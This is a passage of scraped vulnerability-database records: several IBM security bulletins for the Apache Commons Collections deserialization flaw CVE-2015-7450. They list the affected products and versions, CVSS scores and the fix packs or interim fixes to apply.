\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Navigator 2.0.1, 2.0.2 and 2.0.3 \n \nIBM Content Navigator is a component that is available to customers in these products (and the products that contain them): \n\n\n * IBM Content Manager \n * IBM FileNet Content Manager\n * IBM Content Foundation\n * IBM Content Manager OnDemand\n\n## Remediation/Fixes\n\n \nVersion 2.0.1: Upgrade to 2.0.2+ and apply appropriate patch from below \n \nVersion 2.0.2: Apply fix pack [2.0.2.8-ICN-LA001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%2BContent%2BManagement&product=ibm/Other+software/Content+Navigator&release=2.0.2.8&platform=All&function=fixId&fixids=2.0.2.8-ICN-LA001-*&includeSupersedes=0>), or higher \n \nVersion 2.0.3: Apply fix pack [2.0.3.4-ICN-LA009](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%2BContent%2BManagement&product=ibm/Other+software/Content+Navigator&release=2.0.3.4&platform=All&function=fixId&fixids=2.0.3.4-ICN-LA009-*&includeSupersedes=0>), [2.0.3.5-ICN-LA003](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%2BContent%2BManagement&product=ibm/Other+software/Content+Navigator&release=2.0.3.4&platform=All&function=fixId&fixids=2.0.3.4-ICN-LA009-*&includeSupersedes=0>), or higher \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:13:42", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Content Navigator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T12:13:42", "id": "709E27E3685930B945F2FBC357A30EA55914B7F6AA51DED371226AB763C07085", "href": "https://www.ibm.com/support/pages/node/273701", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:03", "description": "## Summary\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SPSS Modeler 14.2 FP3 IF026 and earlier \n\nIBM SPSS Modeler 15 FP3 IF014 and earlier\n\nIBM SPSS Modeler 16 FP2 IF010 and earlier\n\nIBM SPSS Modeler 17 FP1 IF012 and earlier\n\nIBM SPSS Modeler 17.1 IF002 and earlier\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM SPSS Modeler| 14.2.0.3| PI52868| [SPSS Modeler 14.2 Fix Pack 3 Interim Fix 027](<http://www-01.ibm.com/support/docview.wss?uid=swg24041325>) \nIBM SPSS Modeler| 15.0.0.3| PI52868| [SPSS Modeler 15.0 Fix Pack 3 Interim Fix 015](<http://www-01.ibm.com/support/docview.wss?uid=swg24041324>) \nIBM SPSS Modeler| 16.0.0.2| PI52868| [SPSS Modeler 16.0 Fix Pack 2 Interim Fix 011](<http://www-01.ibm.com/support/docview.wss?uid=swg24041323>) \nIBM SPSS Modeler| 17.0.0.1| PI52868| [SPSS Modeler 17.0 Fix Pack 1 Interim Fix 013](<http://www-01.ibm.com/support/docview.wss?uid=swg24041298>) \nIBM SPSS Modeler| 17.1.0.0| PI52868| [SPSS Modeler 17.1 Interim Fix 003](<http://www-01.ibm.com/support/docview.wss?uid=swg24041322>) \n \n## Workarounds and Mitigations\n\nNone \n \n**Important note:** IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www-03.ibm.com/systems/z/advantages/security/integrity_sub.html>). Security and integrity APARs and associated fixes will be posted to this portal. 
IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM SPSS Modeler (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:31", "id": "F665A1245FF1694ED9B578D35C955B51DAA051F90350DA793AFAC0D05F2DCC0B", "href": "https://www.ibm.com/support/pages/node/274449", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:25", "description": "## Summary\n\nThe Knowledge Center Component used in Version 9 of the WebSphere Application Server needs an updated Apache Commons Collections library. 
\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n** DESCRIPTION: **Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWebSphere Application Server| 9.0 \n \n## Remediation/Fixes\n\n**For IBM WebSphere Application Server:** ** \n** \n**For V9.0.0.0 through 9.0.5.1:**\n\n * Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PH16353](<https://www.ibm.com/support/pages/node/1106769> \"PH16353\" )\n\n\\-- OR\n\n * Apply Fix Pack 9.0.5.2 or later (targeted availability 4Q2019).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "46EE401E382E2FF6D9E4A9CC93A2B8F4B5670C253D12335D89A76805C2BB9CAD", "href": "https://www.ibm.com/support/pages/node/1107105", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:49", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Jazz Team Server and Cognos Business Intelligence (Cognos BI) shipped with Rational Insight.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRational Insight 1.1, 1.1.1, 1.1.1.1 and 1.1.1.2| Cognos BI 10.1.1 \nRational Insight 1.1.1.3| Cognos BI 10.2.1 \nRational Insight 1.1.1.4, 1.1.1.5 and 1.1.1.6| Cognos BI 10.2.1 Fix pack 2 \nJazz Team Server 5.0, 5.0.1 and 5.0.2 \nRational Insight 1.1.1.7| Cognos BI 10.2.1 Fix pack 2 \nJazz Team Server 6.0 \n \n## Remediation/Fixes\n\nApply the recommended fixes to all affected versions of Rational Insight. 
\n \n \n**Rational Insight 1.1 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 15 (Implemented by file 10.1.6305.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041201>). \nReview technote [1679272: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Insight 1.1](<http://www-01.ibm.com/support/docview.wss?uid=swg21679272>) for detailed instructions.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1, 1.1.1.1 and 1.1.1.2 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 15 (Implemented by file 10.1.6305.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041201>). \nRead technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.3 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 13 (Implemented by file 10.2.5000.508)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041199>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.4 and 1.1.1.5 and 1.1.1.6 and 1.1.1.7 ** \n \n\n\n 1. If the Data Collection Component (DCC) is used, perform this step first. 
\nReview the topics in [Security Bulletin: A security vulnerability has been identified in IBM WebSphere\u00ae Application Server shipped with multiple IBM Rational products based on IBM's Jazz technology (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971615>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 12 (Implemented by file 10.2.5009.501)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041199>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. 
\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:45", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Insight (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:45", "id": "C55D668E9DAA959DD19BE97127802F50A829DCC234E975F8050767FE8AEFE217", "href": "https://www.ibm.com/support/pages/node/272227", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere eXtreme Scale.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nWebSphere eXtreme Scale 7.1.0 \n\nWebSphere eXtreme Scale 7.1.1\n\nWebSphere eXtreme Scale 8.5\n\nWebSphere eXtreme Scale 8.6\n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_WebSphere eXtreme Scale_| 7.1.0| _PI52470_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.0.3&platform=All&function=all>) \n_WebSphere eXtreme Scale_| 7.1.1| _PI52487_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.1.1&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.1.1&platform=All&function=all>) \n_WebSphere eXtreme Scale_| 8.5.0| _PI52487_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.5.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.5.0.3&platform=All&function=all>) \n_WebSphere eXtreme Scale_| 8.6| _PI52487_| 
[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.6.0.8&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.6.0.8&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNo workaround exists. If you are running WebSphere eXtreme Scale clients or servers, apply the appropriate fix from the previous table. If you are running WebSphere eXtreme Scale clients or servers that are embedded in WebSphere Application Server, apply also the appropriate fix for WebSphere Application Server, which is described here: **_<https://www-304.ibm.com/support/docview.wss?uid=swg21962931>_**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects WebSphere eXtreme Scale (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "7E1AD56C932EE6022D560B647F3D701B90E917C8D245F2619F30EAFAE93014A2", 
"href": "https://www.ibm.com/support/pages/node/272235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:35", "description": "## Summary\n\nVulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository Studio (CVE-2015-7450) \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n \nWebSphere Service Registry and Repository Studio V8.5 \nWebSphere Service Registry and Repository Studio V8.0 \nWebSphere Service Registry and Repository Studio V7.5 \nWebSphere Service Registry and Repository Studio V7.0 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product. \n\n## Remediation/Fixes\n\nFor **WebSphere Service Registry and Repository Studio** the vulnerability has been fixed under APAR IV79089. \n \nThere is only one supported version of WSRR Studio and this is currently V8.5.6.0. Users of previous releases of Studio are entitled to update to V8.5.6.0 which is fully backwards compatible with all previous releases. 
\n \nFor all WSRR Studio releases: \n\n\n * Apply [**V8.5.6.0_IV79089**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.5.6.0-WS-WSRR-Studio-MultiOS-IFIV79089>)** \n**\n * Please note that the server component of WSRR is also vulnerable to this issue. Please see the separate bulletin on how to resolve this issue for the server. \n \n**Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450) **\n\n * IBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.** \n**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository Studio (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": 
"37F20862021E2273CA661487C97F330F1BD3D1DBF7AEDDE1618F02B8075D2210", "href": "https://www.ibm.com/support/pages/node/272677", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:34", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM MQ Appliance.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM MQ Appliance M2000\n\n## Remediation/Fixes\n\nApply fix pack [8.0.0.4](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM%20MQ%20Appliance%20M2000&release=All&platform=All&function=all>) or later maintenance\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM 
MQ Appliance (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "BC0101448BC6D245EC449A34D85006E8788416F6400860557751151F3E3B29C3", "href": "https://www.ibm.com/support/pages/node/272565", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:35", "description": "## Summary\n\nVulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450) \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nWebSphere Service Registry and Repository V8.5 \nWebSphere Service Registry and Repository V8.0 \nWebSphere Service Registry and Repository V7.5 \nWebSphere Service Registry and Repository V7.0 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product. \n\n## Remediation/Fixes\n\nTo remediate this vulnerability you need to apply fixes for both IBM WebSphere Application Server and IBM WebSphere Service Registry and Repository. \n \nFor **WebSphere Application Server** updates refer to this bulletin: \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) \n \nFor **WebSphere Service Registry and Repository** the vulnerability has been fixed under APAR **IV79085**. \n \nIFixes containing IV79085 have been published and are available from Fix Central. 
\n \n**For WSRR V8.5**\n\n * Apply [**V8.5.6.0_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.5.6.0-WS-WSRR-MultiOS-IFIV79085>)\n\n**For WSRR V8.0**\n\n * Apply [**V8.0.0.3_IV65487_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.0.0.3-WS-WSRR-MultiOS-IFIV65487_IV79085>)\n\n**For WSRR V7.5**\n\n * Apply [**V7.5.0.4_IV60346_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=7.5.0.4-WS-WSRR-MultiOS-IFIV60346_IV79085>)\n\n**For WSRR V7.0**\n\n * Apply [**V7.0.0.5_IV60346_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=7.0.0.5-WS-WSRR-MultiOS-IFIV60346_IV79085>)\n\n * IBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 